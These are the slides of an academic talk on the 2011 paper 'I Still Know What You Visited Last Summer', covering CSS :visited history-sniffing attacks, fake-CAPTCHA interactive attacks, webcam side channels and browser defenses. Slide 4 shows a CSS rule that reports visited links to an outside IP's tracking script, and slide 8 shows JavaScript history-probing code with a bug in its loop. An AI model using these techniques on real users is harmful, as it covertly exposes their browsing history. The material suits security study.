Slide 1

Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman Collin Jackson Carnegie Mellon University I Still Know What You Visited Last Summer I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history IEEE Symposium on Security and Privacy, May 2011

Slide 2

2

Slide 3

Outline 3 Introduction Automated Attacks Exp 1: Interactive Attacks Exp 2: Side-Channel Attacks Related Work Conclusion

Slide 4

Introduction 4 History Sniffing through CSS :visited Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271 http://seclists.org/bugtraq/2002/Feb/271 in HTML Visit Google! in CSS #link1:visited { color: red; background: url(http://140.115.53.28/track.php?url=google.com); }

Slide 5

Introduction 5 L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy http://dbaron.org/mozilla/visited-privacy make getComputedStyle act as though all links are unvisitedgetComputedStyle make certain CSS selectors act as though links are always unvisited limits the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline- color, column-rule-color, fill, and stroke The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense still vulnerable with interactive attacks

Slide 6

Introduction 6 Dongseok Jang et al., An Empirical Study of Privacy- Violating Information Flows in JavaScript Web ApplicationsAn Empirical Study of Privacy- Violating Information Flows in JavaScript Web Applications Small sets of links (6~220) probed by real exploiters 46 popular websites, including one from Alexa Top100 This makes interactive attacks possible

Slide 7

Introduction 7 What can history sniffers do? Benign: Websites could use history sniffing to determine whether their users have visited known phishing sites. Websites could seed visitors history with URLs made up for the purpose, and use the URLs to re-identify their visitors. Cookies Malicious: Track visitors across sites for advertising purpose, determining whether they also visit a sites competitors. Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit

Slide 8

Automated Attacks 8 Direct sniffing a:visited { color: red; } var url_array = new Array('http://a.com', 'http://b.com'); var visited_array = new Array(); var link_el = document.createElement('a'); var computed_style = document.defaultView.getComputedStyle(link_el, ""); for (var i = 0; i < url_array.length; i++) { link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); }

Slide 9

Automated Attacks 9 Indirect Sniffing Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements. Make visited and unvisited links cause different images to load. background-image style used in :visited rule Not requires JavaScript

Slide 10

Automated Attacks 10 Side-channel sniffing Timing attacks the attacker can make the page take longer to lay out if a link is visited than if it is unvisited Transparent Underline Any other style rules in :visited Defense Barons solution does well for all 3 types (direct/indirect/side- channel) above

Slide 11

Exp 1: Interactive Attacks 11 Require victims to interact with malicious sites The authors claim that interactive attacks can be disguised as normal interactive tasks that users will not find surprising or suspicious Amazons Mechanical Turk Recruit 307 participants All tasks in this experiment operate within the constraints of Barons defense Visited-link styles only change the color on the screen Pretend to be CAPTCHA tests CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

Slide 12

Exp 1: Interactive Attacks 12 1. Word CAPTCHA Each word is a hyperlink to an URL that the attacker wishes to probe If unvisited, it is drawn in the same color as the background.

Slide 13

Exp 1: Interactive Attacks 13 2. Character CAPTCHA Seven-segment LCD symbols Every letter represents 3 URLs Site-supplied font

Slide 14

Exp 1: Interactive Attacks 14 4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8 is always-on

Slide 15

Exp 1: Interactive Attacks 15 3. Chessboard puzzle Each square contains a URL Only the pawns corresponding to visited sites are made visible Using SVG or text to control the pawns

Slide 16

Exp 1: Interactive Attacks 16 4. Pattern matching puzzle

Slide 17

Exp 1: Interactive Attacks 17 Randomly generated task instances corresponding to known proportions of visited and unvisited links.

Slide 18

Exp 1: Interactive Attacks 18 Automated history-sniffing exploits on all the participants URL set from wtikay.comwtikay.com 7012 commonly visited URLs (from Alexa Top 5000)

Slide 19

Exp 1: Interactive Attacks 19

Slide 20

Exp 1: Interactive Attacks 20

Slide 21

Exp 1: Interactive Attacks 21

Slide 22

Exp 1: Interactive Attacks 22

Slide 23

Exp 1: Interactive Attacks 23

Slide 24

Exp 2: Side-channel Attacks 24 Webcam attacks Random 20 URLs with 10 visited ones Variant 1: Designed to comply with the WCAG standard for seizure safety Variant 2: Make entire browser window flash Brighter color

Slide 25

Exp 2: Side-channel Attacks 25 Author test 100% accuracy for both variants in all condition Will-lit room Person stays still in front of the computer In a dark room, accuracy dropped to 50% Field test 60 / 307 participants

Slide 26

Exp 2: Side-channel Attacks 26 Field test

Slide 27

Exp 2: Side-channel Attacks 27 In real life, ChatRoulette service ChatRoulette The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor

Slide 28

Related Work 28 Page cache Felten et al., Timing Attacks on Web Privacy DNS cache Felten et al., Timing Attacks on Web Privacy Both tactics above Only for the first time Short-term history Loadable cross-origin but only available to logged-in users Facebook, Gmail, Twitter, etc. JavaScript onerror event

Slide 29

Related Work 29 Cookie, Flash Player local shared objects Ad-blocker, Private browsing mode

Slide 30

Conclusion 30 Automated history sniffing attacks have successfully been blocked by Barons solution Interactive attacks are not This paper developed POC of 6 history sniffing exploited against Barons defense 4 interactive attacks 2 detection of the screen through webcam